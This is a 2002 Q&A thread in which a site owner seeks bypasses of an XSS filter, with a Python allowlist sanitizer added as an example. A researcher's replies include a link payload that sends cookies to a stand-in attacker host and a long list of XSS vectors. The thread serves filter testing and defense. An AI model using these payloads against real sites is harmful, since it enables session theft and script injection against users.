Many web-based programs can be vulnerable to a problem known as
"Cross-site scripting" or XSS. XSS is where a user submits malicious code to
a website to get it posted (e.g. in a forum) and automatically executed
by other people's browsers in the security context of the target site.
You can learn more about XSS here:
http://www.cert.org/advisories/CA-2000-02.html
We've written an XSS filter to "clean up" HTML content
entered by a user, trying to achieve a balance between allowing "safe"
HTML and filtering out "unsafe" potential-XSS HTML. This filter takes
several approaches:
1) It removes HTML tags and attributes that are not on an approved list;
2) It searches for and filters/removes certain stylesheet constructs
such as url(...) and expression(...);
3) It limits some HTML attribute values to a safe subset (e.g. src=""
can only be http, ftp, or mailto)
-------- A demonstration:
We have set up a web page where you can try this filter:
http://edis.org/xss/
To see the filter in action, enter some HTML into the text box, then
click one of the three filtering options. The webpage will show the
filtered HTML (rendered and as source).
1. unfiltered: no filtering is done
2. filtered : standard level of filtering
3. filtered with UTF-8 : standard filtering plus additional UTF-related
filtering (assumes entered text is UTF-8 encoded)
-------- Some known XSS exploits:
The main focus of this filter is to remove or prevent scripts from
running. Here are some known exploits that this filter will catch:
<img src="javascript:alert('script in img src')">
<img src="javAscript:alert('script entity coded');">
<img src="jav[alt-0193][alt-0129]script:alert('script utf8 coded')">
([alt-0129] means on Windows machines, press and hold alt, then
press 0193)
<style>li { background:url(javascript:alert("script in style"))
}</style>
--- The question
Provide us with some code that will bypass our filter and cause script
to be executed on the filtered results page. For example, if you get a
javascript alert() by the filter, that would be a successful bypass of
the filter.
Go here and try to bypass the filter: http://edis.org/xss/
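An allowlist filter of the kind the question describes (approved tags and attributes only, URL attributes limited to approved schemes, url()/expression() styles removed), written here as an added example on top of Python's html.parser; it is not the asker's filter, and the tag list, the inclusion of https, and the rule of dropping a whole style attribute rather than one declaration are assumptions.

```python
import html, re
from html.parser import HTMLParser

# Approved tags and, for each, the attributes it may carry; all else is dropped.
ALLOWED = {"a": {"href", "title"}, "b": set(), "i": set(), "br": set(),
           "p": {"style"}, "div": {"style"}, "img": {"src", "alt"}}
URL_ATTRS = {"href", "src"}
# The question names http, ftp and mailto; https is an addition assumed here.
SAFE_SCHEMES = ("http:", "https:", "ftp:", "mailto:")

def safe_url(value):
    # Keep a URL only if it starts with an approved scheme after entity decoding:
    # javAscript:, tab-entity and overlong-UTF-8 spellings never equal one.
    return html.unescape(value).strip().lower().startswith(SAFE_SCHEMES)

def safe_style(value):
    # Drop inline CSS carrying url()/expression() or the tokens used to hide
    # them (CSS comments, backslash escapes, at-rules).
    css = html.unescape(value).lower()
    return not re.search(r"[\\@]|/\*|(url|expression|behaviou?r|binding)\s*\(", css)

class Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.skip = [], 0
    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):        # remove the element and its text
            self.skip += 1
        elif tag in ALLOWED:
            kept = []
            for name, value in attrs:
                if (name in ALLOWED[tag] and value is not None
                        and (name not in URL_ATTRS or safe_url(value))
                        and (name != "style" or safe_style(value))):
                    # re-quoted, so a value cannot break out of its attribute
                    kept.append(' %s="%s"' % (name, html.escape(value, quote=True)))
            self.out.append("<%s%s>" % (tag, "".join(kept)))
    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip = max(0, self.skip - 1)
        elif tag in ALLOWED and tag not in ("img", "br"):
            self.out.append("</%s>" % tag)
    def handle_data(self, data):  # text is re-escaped: a stray '<' cannot open a tag
        if not self.skip:
            self.out.append(html.escape(data, quote=False))

def sanitize(fragment):
    p = Sanitizer()
    p.feed(fragment); p.close()
    return "".join(p.out)
```

Because the URL check is an allowlist of prefixes, none of the scheme spellings listed on this page need to be enumerated; they fail simply by not being http, https, ftp or mailto.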
Request for Question Clarification by joseleon-ga on 10 Aug 2002 01:18 PDT
Hello:
I have found one, but it's not direct or severe; you must prevent
entering links like this:
<a href="http://www.target.com/foo<script>document.location='http://www.attacker.org/?'
+document.cookies</script>">Click here</a>
If someone on your web enters this code in an article, text or
whatever including this link, it can be used by a hacker to steal user
cookies from the domain target.com (if it's running the Zeus webserver)
and send them to attacker.org.
More information:
Zeus Cross Site Scripting
http://support.zeus.com/security/css.html
If this is useful to you, please tell me.
Regards.
Request for Question Clarification by joseleon-ga on 10 Aug 2002 01:34 PDT
Hello:
I have checked all these exploits and it works well with them. I hope
Google Answers has an XSS filter too ;-):
<a href="javascript#alert("hola");">
<div onmouseover="alert('hola');">
<img src="javascript:alert('hola');">
<img dynsrc="javascript:alert('hola');">
<input type="image" dynsrc="javascript:alert('hola');">
<bgsound src="javascript:alert('hola');">
&<script>alert('hola');</script>
&{alert('hola');};
<img src=&{alert('hola');};>
<link rel="stylesheet" href="javascript:alert('hola');">
<iframe src="vbscript:alert('hola');">
<img src="mocha:alert('hola');">
<img src="livescript:alert('hola');">
<a href="about:<script>alert('hola');</script>">
<meta http-equiv="refresh" content="0;url=javascript:alert('hola');">
<body onload="alert('hola');">
<div style="background-image: url(javascript:alert('hola'););">
<div style="behaviour: url([link to code]);">
<div style="binding: url([link to code]);">
<div style="width: expression(alert('hola'););">
<style type="text/javascript">alert('hola');</style>
<object classid="clsid:..." codebase="javascript:alert('hola');">
<style><!--</style><script>alert('hola');//--></script>
<![CDATA[<!--]]><script>alert('hola');//--></script>
<!-- -- --><script>alert('hola');</script><!-- -- -->
<<script>alert('hola');</script>
<img src="blah"onmouseover="alert('hola');">
<img src="blah>" onmouseover="alert('hola');">
<xml src="javascript:alert('hola');">
<xml id="X"><a><b><script>alert('hola');</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>alert('hola');[\xC0][\xBC]/script>
Regards.
Clarification of Question by davious-ga on 10 Aug 2002 11:45 PDT
joseleon-ga, thanks for your comments.
While the Zeus webserver issue is an interesting one it really is a
vulnerability with the Zeus webserver and doesn't pose a security risk
on our side. While it's true users may construct links to other sites
which may be vulnerable to XSS exploits or other security
vulnerabilities there's not really anything we can do to prevent it.
There's no way of knowing how other sites will interpret links
(sometimes things like [b] get turned into HTML, sometimes not) and
it's really up to them to prevent XSS attacks on their side.
The easiest way to do that if you're not expecting HTML input (which
in most cases you wouldn't be), is to just HTML encode any HTML
characters, so < becomes &lt;, > becomes &gt;, and so on. Then no
HTML will get through and any HTML entered will be displayed as raw
HTML in the browser. I believe that's what Google does and that's why
this isn't <b>bold</b>.
The challenge for us is allowing people to enter SOME html, but not
HTML that could cause scripting to be executed on our side by any of
our programs.
Thanks for your efforts! : )
Request for Question Clarification by joseleon-ga on 11 Aug 2002 00:29 PDT
Hello:
To prevent entering malicious code that can affect other sites, you
can also parse the attribute values as if they were normal code, removing
any tag inside. I have tested your script and I couldn't find any
hole; it seems you have followed verbatim all the recommendations to
prevent XSS ;-)
Regards.
Clarification of Question by davious-ga on 12 Aug 2002 09:37 PDT
Thanks for your comments and suggestions! :)
Clarification of Question by davious-ga on 13 Aug 2002 15:33 PDT
The list price is now $200 USD. If anyone else would like to give it
a try please feel free. Thank you.
Request for Question Clarification by joseleon-ga on 14 Aug 2002 01:33 PDT
Just two things more:
- I know your web users won't have the source code for the XSS
filter, but it would be great if you posted the source code to let us
debug it looking for failures. Because it seems you have followed all
the recommendations against XSS, I think there's no way to bypass
your filter. The only way would be to find a bug in your script.
- In any case, would a full test of your script with a lot, lot, lot of
samples deserve the money? I ask you this because if nobody can
bypass your filter you will get an answer: "your filter is perfect".
Regards.
Clarification of Question by davious-ga on 14 Aug 2002 16:32 PDT
I'm not able to post the source code at this time, but I may be able
to at a future date. If it turns out I'm able to post the source code
at a future date, I'll repost the question.